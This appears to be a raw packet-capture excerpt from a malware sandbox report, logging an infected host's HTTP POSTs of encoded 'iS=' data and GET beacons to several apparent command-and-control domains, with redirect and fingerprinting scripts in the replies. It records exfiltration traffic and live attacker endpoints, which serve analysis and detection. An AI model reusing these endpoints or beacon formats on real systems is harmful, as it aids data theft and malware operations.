                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g86kpxjLFAyGRD3H1hmw74LuGcWjpo6xuZeA==
Jan 11, 2025 03:59:41.786242962 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.11.20 | 49829 | 27.124.4.246 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:44.320941925 CET | 775 | OUT | POST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9auSTQA4zvCDBGog4fDpYUdd867nABTZFo=
Jan 11, 2025 03:59:44.629468918 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.11.20 | 49830 | 27.124.4.246 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:47.133862972 CET | 2578 | OUT | POST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: iS= [TRUNCATED]
Jan 11, 2025 03:59:47.133928061 CET | 5346 | OUT |
                                                                                                                                                                              Data Ascii: WZo7Zsm+ggj9qUVY8oOFh72hgPmXXp+rr3ZR4iQTVjqcJMUJ2BI/ZToCTCjabDNCERWMoU90yjtOBkMna0MNMLH5fYs9AwhBMgY3jGoV5RVZDyZuP1THFYhVJ7thHyXdJMRwHCuOfFQTl2jNZryRpd/gOsxIlPphoYURRWmGk1jeTX3oMDKCf6J/lv3Rqc/3/xFzwn5zMGGlxDvmjjEKG3SOH06Zo6eDJhP1T0jJHuoOMw4vNr3
Jan 11, 2025 03:59:47.424042940 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.11.20 | 49831 | 27.124.4.246 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:49.971379042 CET | 487 | OUT | GET /n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:59:50.274688959 CET | 533 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.11.20 | 49832 | 46.30.211.38 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:55.518316031 CET | 761 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
Jan 11, 2025 03:59:55.740731955 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:55 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.11.20 | 49833 | 46.30.211.38 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:59:58.266012907 CET | 781 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
Jan 11, 2025 03:59:58.492043972 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:58 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.11.20 | 49834 | 46.30.211.38 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:00:01.016321898 CET | 2578 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: iS= [TRUNCATED]
Jan 11, 2025 04:00:01.016346931 CET | 2578 | OUT |
                                                                                                                                                                              Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
Jan 11, 2025 04:00:01.016426086 CET | 2774 | OUT |
                                                                                                                                                                              Data Ascii: x9gMkrlEdMGlwofSwL0ZPC3bzDXzwqoO2v8fBKhxbELEsNiXhH0QhMvc1g2SX4ZG+iUSZyJdwS1kPCKh0xbdzGrgF9UfApy9vQzWVR64Z++YaypnnDF8guL3x3Cwmzkwy+Ke1uuKaW7rBpAXECmKYlgluJu7FSCF0w0Jp4pxpgpeNs3Kr8Q4s28xNR8jj2omXDSHSV5dc9SgaP2ASc5sokqMFrra5RjT3txxrkEXh/bQNifihdU
Jan 11, 2025 04:00:01.238326073 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:00:01 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.11.20 | 49835 | 46.30.211.38 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:00:03.765655041 CET | 489 | OUT | GET /uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 04:00:03.991146088 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:00:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.20 | 49837 | 103.224.182.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:00:09.172243118 CET | 749 | OUT | POST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
Jan 11, 2025 04:00:09.346985102 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:09 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564409.2393264; expires=Tue, 09-Jan-2035 03:00:09 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.20 | 49838 | 103.224.182.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:00:11.868295908 CET | 769 | OUT | POST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
Jan 11, 2025 04:00:12.052470922 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:11 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564411.5059612; expires=Tue, 09-Jan-2035 03:00:11 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.11.20 | 49839 | 103.224.182.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:00:14.553235054 CET | 2578 | OUT | POST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: iS=[TRUNCATED]
Jan 11, 2025 04:00:14.553253889 CET | 2578 | OUT
                                                                                                                                                                              Data Ascii: utYCiLP6zrcbSyR1EsNsIAnERGApbpcp0Nmp1U6W2JyaBcTdyHV8fsHX1LasBI+706xI47dUv7yQo40siRgOxhhjDLgD2vwfAYQoE4ETicVsBQrIo5A7+En3hwUxRQK4CQITgWxEIivul6yeLRZXovDfGn+DX+9xuSk0i+1mjXzvl3ejHisLavFndgfN911DLJhZz4e26IIoq3sKLO4qByKn6JXTSZ1Hi1DKrkIZAUIzNVucHXv
Jan 11, 2025 04:00:14.553335905 CET | 2762 | OUT
                                                                                                                                                                              Data Ascii: wZSnEp6eP9ZcnfIRHpdFI7M0EpEDxdmwyrsg0IK2KY40Q4/UH0+89InW8RXeIcWp+1RX5X0mWWiz4fW89E3UOotVm5z/EJnimqGxmtYXOYFYNBMft33dfT7aN+x8sjLtRNojatLaJKnSQXINKsfH1BSwfyDnp4+Dbbt16ewerqWoE19XMclOQJmEPsM6w7tk4gfR4uA6vgXGEjClMVRF97Utd/mwzr+a45TzABZ6ofU+BqGdmgB
Jan 11, 2025 04:00:14.729598045 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:14 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564414.1745252; expires=Tue, 09-Jan-2035 03:00:14 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.11.20 | 49840 | 103.224.182.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:00:17.247589111 CET | 485 | OUT | GET /3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 04:00:17.433700085 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:17 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564417.8161415; expires=Tue, 09-Jan-2035 03:00:17 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-length: 1460
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http [TRUNCATED]
Jan 11, 2025 04:00:17.433710098 CET | 443 | IN
                                                                                                                                                                              Data Ascii: w.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; UR


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.11.20 | 49848 | 101.35.209.183 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:01:55.462804079 CET | 758 | OUT | POST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
Jan 11, 2025 04:01:55.768549919 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:01:55 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.11.20 | 49849 | 101.35.209.183 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:01:58.284071922 CET | 778 | OUT | POST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
